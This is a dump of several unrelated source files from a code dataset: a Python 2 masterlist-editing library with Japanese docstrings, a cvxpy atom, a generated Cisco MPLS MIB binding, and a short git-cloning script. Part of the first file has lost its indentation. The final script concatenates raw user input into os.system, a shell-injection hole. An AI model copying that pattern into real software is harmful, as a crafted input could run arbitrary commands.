basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveAfter(srcname, srctarget, basename, basetarget)
return self
def MoveTop(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ先頭** に移動します。
これは、ユーザーリストの「OVERRIDE - TOP」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveTop(srcname, srctarget, basename, basetarget)
return self
def MoveBottom(self, srcname, basename):
"""
*srcname* で指定した名称のオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ末尾** に移動します。
これは、ユーザーリストの「OVERRIDE - BOTTOM」の操作に該当します。
:param string srcname: 移動対象の名称
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._findNameOfTarget(srcname)
if srctarget == None:
raise KeyError, "The specified name is not found: %s" % (srcname)
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._moveBottom(srcname, srctarget, basename, basetarget)
return self
def InsertBefore(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **前** に移動します。
これは、ユーザーリストの「ADD - BEFORE」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertBefore(newobject, srctarget, basename, basetarget)
return self
def InsertAfter(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **後** に移動します。
これは、ユーザーリストの「ADD - AFTER」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertAfter(newobject, srctarget, basename, basetarget)
return self
def InsertTop(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ先頭** に移動します。
これは、ユーザーリストの「ADD - TOP」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertTop(newobject, srctarget, basename, basetarget)
return self
def InsertBottom(self, newobject, basename):
"""
*newobject* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ末尾** に移動します。
これは、ユーザーリストの「ADD - BOTTOM」の操作に該当します。
*newobject* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobject: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
srctarget = self._createOfTarget(newobject)
if srctarget == None:
raise TypeError, "expected str, unicode, Line, Block or Group."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
self._insertBottom(newobject, srctarget, basename, basetarget)
return self
def AppendLine(self, newlinestring, basename):
"""
*newlinestring* で指定した行文字列を、 *basename* で指定した名称のオブジェクトにメッセージを **追加** します。
これは、ユーザーリストの「FOR - APPEND」の操作に該当します。
:param string newlinestring: 挿入対象の名称
:param string basename: 移動先のソート基準の名称
"""
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
newline = Line(newlinestring)
self._appendLine(newlinestring, newline, basename, basetarget)
return self
def ReplaceLine(self, newlinestring, basename):
"""
*newlinestring* で指定した行文字列を、 *basename* で指定した名称のオブジェクトのメッセージを **置換** します。
これは、ユーザーリストの「FOR - REPLACE」の操作に該当します。
:param string newlinestring: 挿入対象の名称
:param string basename: 移動先のソート基準の名称
"""
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
newline = Line(newlinestring)
self._replaceLine(newlinestring, newline, basename, basetarget)
return self
def ReplaceBefore(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **前** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - BEFORE」の操作を行い、存在しない場合は、「ADD - BEFORE」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveBefore(newobjectorname, srctarget, basename, basetarget)
else:
self._insertBefore(newobjectorname, srctarget, basename, basetarget)
return self
def ReplaceAfter(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **後** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - AFTER」の操作を行い、存在しない場合は、「ADD - AFTER」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveAfter(newobjectorname, srctarget, basename, basetarget)
else:
self._insertAfter(newobjectorname, srctarget, basename, basetarget)
return self
def ReplaceTop(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ先頭** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - TOP」の操作を行い、存在しない場合は、「ADD - TOP」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveTop(newobjectorname, srctarget, basename, basetarget)
else:
self._insertTop(newobjectorname, srctarget, basename, basetarget)
return self
def ReplaceBottom(self, newobjectorname, basename):
"""
*newobjectorname* で指定したオブジェクトを、 *basename* で指定した名称のオブジェクトの **グループ末尾** に **移動又は挿入** します。
これは、既にマスタリストに *newobjectorname* で指定したオブジェクトが存在する場合は、
ユーザーリストの「OVERRIDE - BOTTOM」の操作を行い、存在しない場合は、「ADD - BOTTOM」の操作を行います。
*newobjectorname* には名称またはグループ、ブロック、行オブジェクトを指定できます。
名称を指定した場合、行文字列からMODsと判定できた場合はMODs、それ以外の場合はグループとして扱います。
明示的にMODsかグループかを指定したい場合はオブジェクトを指定して下さい。
:param (string,Group,Block,Line) newobjectorname: 挿入対象の名称又はオブジェクト
:param string basename: 移動先のソート基準の名称
"""
(move, srctarget) = self._replaceSwitchingOfTarget(newobjectorname)
if srctarget == None:
raise KeyError, "Invalid target was supplied."
basetarget = self._findNameOfTarget(basename)
if basetarget == None:
raise KeyError, "The specified name is not found: %s" % (basename)
if move:
self._moveBottom(newobjectorname, srctarget, basename, basetarget)
else:
self._insertBottom(newobjectorname, srctarget, basename, basetarget)
return self
def _onOperationRecord(self, operationname, param1, param1target, param2, param2target):
"""
マスタリストの操作を行った場合に、呼び出されます。
これは、操作した内容を記録するために用意されています。
:param string operationname: 操作の名称
:param (string,Group,Block,Line) param1: 操作のパラメータ1(文字列及びオブジェクト)
:param string param1target: パラメータ1のオブジェクト
:param (string,Group,Block,Line) param2: 操作のパラメータ2(文字列及びオブジェクト)
:param string param2target: パラメータ2のオブジェクト
"""
if self._recording:
# 記録中なら実行する。
param1type = u""
if isinstance(param1target, Line):
param1type = u"MODs"
elif isinstance(param1target, Block):
param1type = u"MODs"
elif isinstance(param1target, Group):
param1type = u"Group"
param2type = u""
if isinstance(param2target, Line):
param2type = u"MODs"
elif isinstance(param2target, Block):
param2type = u"MODs"
elif isinstance(param2target, Group):
param2type = u"Group"
recordstring = u"%sFrom%sTo%s" % (operationname, param1type, param2type)
param1string = self._findTargetOfName(param1)
param2string = self._findTargetOfName(param2)
self._archiverecord += [
{
u"Record" : recordstring,
u"Param1" : param1string,
u"Param2" : param2string
}
]
return self
    def ClearRecord(self):
        """Discard every recorded operation.

        See :meth:`BeginRecord` for details of operation recording.
        """
        self._archiverecord = []
        return self
    def BeginRecord(self):
        """Start recording masterlist operations.

        After BeginRecord, the following calls are recorded internally and a
        userlist definition can later be generated from the record with
        :meth:`GenerateUserlistFromRecord`:

        - :meth:`MoveBefore` :meth:`MoveAfter` :meth:`MoveTop` :meth:`MoveBottom`
        - :meth:`InsertBefore` :meth:`InsertAfter` :meth:`InsertTop` :meth:`InsertBottom`
        - :meth:`AppendLine` :meth:`ReplaceLine`
        - the Move or Insert actually performed internally by
          :meth:`ReplaceBefore` :meth:`ReplaceAfter` :meth:`ReplaceTop` :meth:`ReplaceBottom`
        - changes applied through :meth:`Operater` (note: the userlist later
          generated from the record is not guaranteed to match the definition
          that was passed to Operater — comment and blank lines in particular
          are dropped)

        Direct object manipulation such as
        :meth:`LinkedTreeObject.LinkedTreeObject.AddChild` is NOT recorded.
        Stop recording with :meth:`EndRecord`; discard the record with
        :meth:`ClearRecord`.
        """
        self._recording = True
        return self
    def EndRecord(self):
        """Stop recording masterlist operations.

        See :meth:`BeginRecord` for details of operation recording.
        """
        self._recording = False
        return self
    def GenerateUserlistFromRecord(self):
        """Build a userlist definition (ADD / OVERRIDE / FOR syntax) from the
        operations recorded since :meth:`BeginRecord`.

        The output is not guaranteed to be accepted by BOSS itself (group
        operations in particular), although pyOssLib can replay everything
        this method emits.

        :rtype: UserlistLib.Userlist
        :return: the generated userlist object
        """
        ret = None
        procedure = Userlist()
        for record in self._archiverecord:
            recordstring = record.get(u"Record", u"")
            param1string = record.get(u"Param1", u"")
            param2string = record.get(u"Param2", u"")
            # recordstring has the shape "<Rule><Sort>From<Type1>To<Type2>".
            match = regexRecord.search(recordstring)
            if match != None:
                command = u"%s" % (match.group(1))
                rule = u"%s" % (match.group(3))
                sort = u"%s" % (match.group(4))
                param1type = u"%s" % (match.group(6))
                param2type = u"%s" % (match.group(7))
                operation = UserOperation()
                if command == u"AppendLine":
                    # rule
                    operation.AddNewRuleFor(param2string)
                    # message
                    operation.AddNewMessageAppend(param1string)
                elif command == u"ReplaceLine":
                    # rule
                    operation.AddNewRuleFor(param2string)
                    # message
                    operation.AddNewMessageReplace(param1string)
                else:
                    # rule
                    if rule == u"Move":
                        operation.AddNewRuleOverride(param1string)
                    elif rule == u"Insert":
                        operation.AddNewRuleAdd(param1string)
                    #if param1type == u"Group":
                    #    operation.AddNewRuleAddGroup(param1string)
                    #elif param1type == u"MODs":
                    #    operation.AddNewRuleAdd(param1string)
                    # sort
                    if sort == u"Before":
                        operation.AddNewSortBefore(param2string)
                    elif sort == u"After":
                        operation.AddNewSortAfter(param2string)
                    elif sort == u"Top":
                        operation.AddNewSortTop(param2string)
                    elif sort == u"Bottom":
                        operation.AddNewSortBottom(param2string)
                procedure.AddChild(operation)
        procedure.UnnecessaryMergeOperations()
        for operation in procedure.EachChilds():
            operation.AddNewBlank()
        ret = procedure
        return ret
    def _operaterUserOperation(self, operation):
        """Apply a single UserOperation to this masterlist.

        The operation's RULE/SORT command pair is mapped onto the matching
        public method (e.g. OVERRIDE + BEFORE -> MoveBefore), then any
        MESSAGE lines are applied via AppendLine / ReplaceLine.

        :raises ValueError: when the operation is not valid
        """
        if not operation.IsValid():
            raise ValueError, "Specified operation can not be performed."
        ruletypestring = u""
        ruleparam = None
        sortparam = None
        if operation.IsType(EnumCommandType.ADD):
            ruletypestring = u"Insert"
            ruleparamstring = operation.GetUserLine(EnumCommandType.RULE).ParamString
            match = regexMods.search(ruleparamstring)
            if match is not None:
                # Treat the parameter as a MOD line.
                ruleparam = Line(ruleparamstring)
            else:
                # Treat the parameter as a group name.
                ruleparam = Group(ruleparamstring)
            sortparam = operation.GetUserLine(EnumCommandType.SORT).ParamString
        elif operation.IsType(EnumCommandType.OVERRIDE):
            ruletypestring = u"Move"
            ruleparam = operation.GetUserLine(EnumCommandType.RULE).ParamString
            sortparam = operation.GetUserLine(EnumCommandType.SORT).ParamString
        elif operation.IsType(EnumCommandType.FOR):
            # FOR has no move/insert part; only the MESSAGE lines apply.
            ruletypestring = u""
            ruleparam = operation.GetUserLine(EnumCommandType.RULE).ParamString
            sortparam = None
        sorttypestring = u""
        if operation.IsType(EnumCommandType.BEFORE):
            sorttypestring = u"Before"
        elif operation.IsType(EnumCommandType.AFTER):
            sorttypestring = u"After"
        elif operation.IsType(EnumCommandType.TOP):
            sorttypestring = u"Top"
        elif operation.IsType(EnumCommandType.BOTTOM):
            sorttypestring = u"Bottom"
        funclists = [
            u"MoveBefore",
            u"MoveAfter",
            u"MoveTop",
            u"MoveBottom",
            u"InsertBefore",
            u"InsertAfter",
            u"InsertTop",
            u"InsertBottom",
            ]
        # Dispatch to the matching public method, e.g. "Move" + "Before".
        funcname = u"%s%s" % (ruletypestring, sorttypestring)
        if funcname in funclists:
            func = getattr(self, funcname)
            func(ruleparam, sortparam)
        # Apply APPEND / REPLACE message lines to the rule target.
        messageobjects = operation.GetUserLineAll(EnumCommandType.MESSAGE)
        for messageobj in messageobjects:
            messageparam1 = messageobj.ParamString
            messageparam2 = self._findTargetOfName(ruleparam)
            if messageobj.IsType(EnumCommandType.APPEND):
                self.AppendLine(messageparam1, messageparam2)
            elif messageobj.IsType(EnumCommandType.REPLACE):
                self.ReplaceLine(messageparam1, messageparam2)
        return self
def _operaterUserlist(self, userlist):
"""
ユーザーリストオブジェクトを元にマスタリストの操作を行います。
"""
for operation in userlist.EachChilds():
if operation.IsValid():
try:
self._operaterUserOperation(operation)
except BaseException as ex:
print u"%s\r\n %s" % (ex, operation)
return self
def Operater(self, operation):
"""
*operation* で指定したオブジェクトを元にマスタリストの操作を行います。
*operation* にはユーザーリストオブジェクト、または、ユーザーオペレーションオブジェクトを指定できます。
このとき渡されたオブジェクトがユーザーリストオブジェクトの場合、その中の有効な操作のみ実行され、無効な操作は無視されます。(実際の操作の段階で例外が発生した場合は、次のオペレーションを処理します)
渡されたオブジェクトがユーザーオペレーションオブジェクトの場合、無効な操作を実行しようとすると例外を発生します。
操作が有効か無効かの判断は、\ :meth:`UserlistLib.UserOperation.IsValid`\ で判断します。
引数に渡すことが可能なオブジェクトについては、それぞれ「 \ :class:`UserlistLib.Userlist`\ \ :class:`UserlistLib.UserOperation`\ 」を参照して下さい。
:param (UserOperation,Userlist) operation: ユーザーリスト操作情報を持つオブジェクト
"""
if isinstance(operation, UserOperation):
self._operaterUserOperation(operation)
elif isinstance(operation, Userlist):
self._operaterUserlist(operation)
else:
raise TypeError, "Specified operation can not be performed. expected UserOperation or Userlist."
return self
    def Save(self, fullpathfilename = u"", encoding=None):
        """Write the current tree back out as a masterlist file.

        When *fullpathfilename* is omitted, the file used by the last
        Load/Save call is overwritten.

        :param string fullpathfilename: file to write
        :param string encoding: file encoding (official lists use
            Windows-1252 'cp1252' or UTF-8 with BOM 'utf-8-sig')
        """
        if len(fullpathfilename) != 0:
            self._fullpathfilename = fullpathfilename.lstrip().rstrip()
        if len(self._fullpathfilename) == 0:
            raise IOError, "Invalid filename."
        if os.path.exists(self._fullpathfilename):
            os.remove(self._fullpathfilename)
        # Drop garbage blocks that hold no line data.
        for waste in self._getWasteBlock():
            waste.Parent().DeleteChild(waste)
        # Decide the output encoding.
        if encoding is not None:
            self._encoding = encoding
        #print u"Save encoding: %s" % (self._encoding)
        # --------------------------------------------------
        # Default handler for encoding errors.
        # --------------------------------------------------
        if getattr(self, "OnEncodingErrorFromSave", None) == None:
            def _onEncodingErrorFromSave(linestring, linecount, encoding):
                # The Windows console is cp932, so printing the offending
                # line could itself fail to encode; by default only the
                # line number is reported.
                print u"UNICODE(%s) encoding error! skip line: %s" % (encoding, linecount)
                return
            self.OnEncodingErrorFromSave = _onEncodingErrorFromSave
        linecount = 0
        # NOTE(review): "wU" combines write mode with universal-newline 'U',
        # which is only meaningful for reading — confirm intent.
        filemasterlist = codecs.open(self._fullpathfilename, "wU", self._encoding)
        try:
            #filemasterlist.write(self.MasterlistOutput())
            for object in self.EachRecursion():
                if isinstance(object, Line):
                    linecount += 1
                    linestring = u""
                    # --------------------------------------------------
                    # Drop lines containing characters that cannot be
                    # represented in the target encoding.
                    # --------------------------------------------------
                    try:
                        temp = object.LineString.encode(self._encoding)
                        linestring = object.LineString
                    except UnicodeEncodeError:
                        param_linestring = copy.copy(linestring)
                        param_linecount = copy.copy(linecount)
                        param_encoding = copy.copy(self._encoding)
                        self.OnEncodingErrorFromSave(param_linestring, param_linecount, param_encoding)
                        linestring = u""
                    linestring = u"%s\r\n" % (linestring)
                    filemasterlist.write(linestring)
        finally:
            filemasterlist.close()
        return self
    def Load(self, fullpathfilename = u"", encoding=None):
        """Read a masterlist file and parse it into this object tree.

        When *fullpathfilename* is omitted, the file used by the last
        Load/Save call is re-read.  When *encoding* is omitted it is
        auto-detected (chardet UniversalDetector).

        :param string fullpathfilename: file to read
        :param string encoding: file encoding (official lists use
            Windows-1252 'cp1252' or UTF-8 with BOM 'utf-8-sig')
        """
        if len(fullpathfilename) != 0:
            self._fullpathfilename = fullpathfilename.lstrip().rstrip()
        if len(self._fullpathfilename) == 0:
            raise IOError, "Invalid filename."
        if not os.path.exists(self._fullpathfilename):
            raise IOError, "No such file."
        if self.ChildCount() != 0:
            # Discard any previously loaded children before re-loading.
            for child in self.EachChilds():
                self.DeleteChild(child)
        # --------------------------------------------------
        # Detect the file encoding.
        # --------------------------------------------------
        if encoding is None:
            detector = UniversalDetector()
            detector.reset()
            for line in file(self._fullpathfilename, 'rb'):
                detector.feed(line)
                if detector.done:
                    break
            detector.close()
            encoding = detector.result["encoding"]
        self._encoding = encoding
        #print u"Load encoding: %s" % (self._encoding)
        # --------------------------------------------------
        # Default handler for decoding errors.
        # --------------------------------------------------
        if getattr(self, "OnDecodingErrorFromLoad", None) == None:
            def _onDecodingErrorFromLoad(linecount, linestring, encoding):
                # The Windows console is cp932, so printing the offending
                # line could itself fail to encode; by default only the
                # line number is reported.
                print u"UNICODE(%s) decoding error! skip line: %s" % (encoding, linecount)
                return None
            self.OnDecodingErrorFromLoad = _onDecodingErrorFromLoad
        # --------------------------------------------------
        # Default factory for line objects.
        # --------------------------------------------------
        if getattr(self, "OnCreateLineObject", None) == None:
            def _onCreateLineObject(linecount, linestring):
                # Create the line object (with line correction enabled).
                return Line(linestring, True)
            self.OnCreateLineObject = _onCreateLineObject
        # --------------------------------------------------
        # Read the masterlist and expand it into objects.
        # --------------------------------------------------
        thisGroup = self
        thisBlock = Block()
        thisGroup.AddChild(thisBlock)
        countbegingroup = 0
        countendgroup = 0
        linecount = 0
        filemasterlist = open(self._fullpathfilename, "rU")
        #filemasterlist = codecs.open(self._fullpathfilename, "rU", "shift_jis")
        try:
            for linestring in filemasterlist:
                if linecount == 0:
                    linestring = CommonLib.CutBomString(linestring)
                linecount += 1
                # --------------------------------------------------
                # Drop lines containing characters that fail to decode.
                # NOTE(review): decoding, re-encoding to UTF-8 bytes, and
                # interpolating into a unicode literal re-decodes those
                # bytes as ASCII — non-ASCII text likely ends up treated
                # as a decode error; confirm against real data.
                # --------------------------------------------------
                try:
                    linestring = u"%s" % (unicode(linestring, self._encoding).encode("utf-8"))
                except UnicodeDecodeError:
                    param_linecount = copy.copy(linecount)
                    param_linestring = copy.copy(linestring)
                    param_encoding = copy.copy(self._encoding)
                    linestring = self.OnDecodingErrorFromLoad(param_linecount, param_linestring, param_encoding)
                    if (isinstance(linestring, str)) or (isinstance(linestring, unicode)):
                        try:
                            linestring = u"%s" % (unicode(linestring, self._encoding).encode("utf-8"))
                        except UnicodeDecodeError:
                            linestring = u""
                    else:
                        linestring = u""
                # Create the line object.
                #thisLine = Line(linestring, True)
                param_linecount = copy.copy(linecount)
                thisLine = self.OnCreateLineObject(param_linecount, linestring)
                if not isinstance(thisLine, Line):
                    raise SyntaxError, "OnCreateLineObject() is an invalid object to return."
                if thisLine.IsType(EnumLineType.BEGINGROUP):
                    countbegingroup += 1
                    # Create the new group with an initial block and descend into it.
                    newGroup = Group(thisLine.BeginGroupName, None, False)
                    thisGroup.AddChild(newGroup)
                    thisBlock = Block()
                    newGroup.AddChild(thisBlock)
                    thisGroup = newGroup
                if thisLine.IsType(EnumLineType.MODS):
                    # Each MODs line starts a new block.
                    thisBlock = Block()
                    thisGroup.AddChild(thisBlock)
                if thisLine.IsType(EnumLineType.ENDGROUP):
                    countendgroup += 1
                    if countbegingroup < countendgroup:
                        raise SyntaxError, "The group does not match the beginning and end."
                    # Put the end-group line in its own block.
                    thisBlock = Block()
                    thisGroup.AddChild(thisBlock)
                # Attach the line to the current block.
                thisBlock.AddChild(thisLine)
                if thisLine.IsType(EnumLineType.ENDGROUP):
                    # Ascend back to the parent group and open a fresh block.
                    if thisGroup.Parent() is None:
                        raise SyntaxError, "The group does not match the beginning and end."
                    thisGroup = thisGroup.Parent()
                    # The block created here can end up unused; such garbage
                    # blocks are removed after the parse below.
                    thisBlock = Block()
                    thisGroup.AddChild(thisBlock)
            if countbegingroup != countendgroup:
                raise SyntaxError, "The group does not match the beginning and end."
        finally:
            # Close the masterlist file.
            filemasterlist.close()
        # Drop garbage blocks that hold no line data.
        for waste in self._getWasteBlock():
            waste.Parent().DeleteChild(waste)
        return self
def DebugSave(self, fullpath):
"""
指定したファイルへデバッグ情報を出力します。
デバッグ出力には\ :meth:`LinkedTreeObject.LinkedTreeObject.DebugOutput`\ を使用します。
:param string fullpath: 保存するファイル名
"""
if os.path.exists(fullpath):
os.remove(fullpath)
filedebug = codecs.open(fullpath, "wU", "utf-8-sig")
try:
filedebug.write(self.DebugOutput())
finally:
filedebug.close()
return self
def DebugSimpleSave(self, fullpath):
"""
指定したファイルへシンプルなデバッグ情報を出力します。
デバッグ出力には\ :meth:`LinkedTreeObject.LinkedTreeObject.DebugSimpleOutput`\ を使用します。
:param string fullpath: 保存するファイル名
"""
if os.path.exists(fullpath):
os.remove(fullpath)
filedebug = codecs.open(fullpath, "wU", "utf-8-sig")
try:
filedebug.write(self.DebugSimpleOutput())
finally:
filedebug.close()
return self
if __name__ == "__main__":
    # Running the module directly just prints version and license info.
    print u"%s Version: %s %s" % (__appname__, __version__, __copyright__)
    print u"%s" % (__license__)
| jakenjarvis/pyOss | pyOssLib/v1_0/MasterlistLib.py | Python | gpl-3.0 | 89,690 |
"""
Copyright 2013 Steven Diamond
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cvxpy.atoms.quad_over_lin import quad_over_lin
def sum_squares(expr):
    """The sum of the squares of the entries.

    Parameters
    ----------
    expr: Expression
        The expression to take the sum of squares of.

    Returns
    -------
    Expression
        An expression representing the sum of squares.
    """
    # sum_squares(x) is expressed as quad_over_lin(x, 1) == sum(x**2) / 1,
    # which is jointly convex and DCP-compliant.
    return quad_over_lin(expr, 1)
| SteveDiamond/cvxpy | cvxpy/atoms/sum_squares.py | Python | gpl-3.0 | 930 |
../../../../../share/pyshared/twisted/python/urlpath.py | Alberto-Beralix/Beralix | i386-squashfs-root/usr/lib/python2.7/dist-packages/twisted/python/urlpath.py | Python | gpl-3.0 | 55 |
""" CISCO_IETF_MPLS_ID_STD_03_MIB
Copyright (c) 2012 IETF Trust and the persons identified
as the document authors. All rights reserved.
This MIB module contains generic object definitions for
MPLS Traffic Engineering in transport networks. This module is a
cisco\-ized version of the IETF draft\:
draft\-ietf\-mpls\-tp\-te\-mib\-03.
"""
import re
import collections
from enum import Enum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk.errors import YPYError, YPYModelError
class CiscoIetfMplsIdStd03Mib(object):
    """Top-level container for the CISCO-IETF-MPLS-ID-STD-03-MIB model.

    NOTE(review): this appears to be ydk-gen generated binding code — prefer
    regenerating from the MIB/YANG source over hand-editing.

    .. attribute:: cmplsidobjects

        **type**\: :py:class:`Cmplsidobjects <ydk.models.cisco_ios_xe.CISCO_IETF_MPLS_ID_STD_03_MIB.CiscoIetfMplsIdStd03Mib.Cmplsidobjects>`
    """

    # Module prefix and revision this binding was generated from.
    _prefix = 'CISCO-IETF-MPLS-ID-STD-03-MIB'
    _revision = '2012-06-07'

    def __init__(self):
        self.cmplsidobjects = CiscoIetfMplsIdStd03Mib.Cmplsidobjects()
        self.cmplsidobjects.parent = self


    class Cmplsidobjects(object):
        """Scalar identification objects (Global_ID, ICC, Node_ID).

        .. attribute:: cmplsglobalid

            Unique operator identifier, also called MPLS-TP Global_ID.

            **type**\: str, **length:** 4

        .. attribute:: cmplsicc

            MPLS-TP ITU-T Carrier Code (ICC) assigned to a network.

            **type**\: str, **length:** 1..6

        .. attribute:: cmplsnodeid

            MPLS-TP Node_ID, unique within the scope of the Global_ID.

            **type**\: int, **range:** 0..4294967295
        """

        _prefix = 'CISCO-IETF-MPLS-ID-STD-03-MIB'
        _revision = '2012-06-07'

        def __init__(self):
            self.parent = None
            self.cmplsglobalid = None
            self.cmplsicc = None
            self.cmplsnodeid = None

        @property
        def _common_path(self):
            # Absolute model path of this container.
            return '/CISCO-IETF-MPLS-ID-STD-03-MIB:CISCO-IETF-MPLS-ID-STD-03-MIB/CISCO-IETF-MPLS-ID-STD-03-MIB:cmplsIdObjects'

        def is_config(self):
            ''' Returns True if this instance represents config data else returns False '''
            return False

        def _has_data(self):
            # True when any leaf has been populated.
            if self.cmplsglobalid is not None:
                return True
            if self.cmplsicc is not None:
                return True
            if self.cmplsnodeid is not None:
                return True
            return False

        @staticmethod
        def _meta_info():
            from ydk.models.cisco_ios_xe._meta import _CISCO_IETF_MPLS_ID_STD_03_MIB as meta
            return meta._meta_table['CiscoIetfMplsIdStd03Mib.Cmplsidobjects']['meta_info']

    @property
    def _common_path(self):
        # Absolute model path of the MIB root.
        return '/CISCO-IETF-MPLS-ID-STD-03-MIB:CISCO-IETF-MPLS-ID-STD-03-MIB'

    def is_config(self):
        ''' Returns True if this instance represents config data else returns False '''
        return False

    def _has_data(self):
        if self.cmplsidobjects is not None and self.cmplsidobjects._has_data():
            return True
        return False

    @staticmethod
    def _meta_info():
        from ydk.models.cisco_ios_xe._meta import _CISCO_IETF_MPLS_ID_STD_03_MIB as meta
        return meta._meta_table['CiscoIetfMplsIdStd03Mib']['meta_info']
| 111pontes/ydk-py | cisco-ios-xe/ydk/models/cisco_ios_xe/CISCO_IETF_MPLS_ID_STD_03_MIB.py | Python | apache-2.0 | 3,540 |
import os
import re
import json
import pprint
# SHA-1 of git's well-known empty tree; diffing against it yields the full
# content of the first commit.
EMPTY = '4b825dc642cb6eb9a060e54bf8d69288fbee4904'
repo = str(input('Enter clone url to git repo: '))
repo_folder = repo.split('/')[-1].split('.git')[0]
os.system('git clone ' + repo)
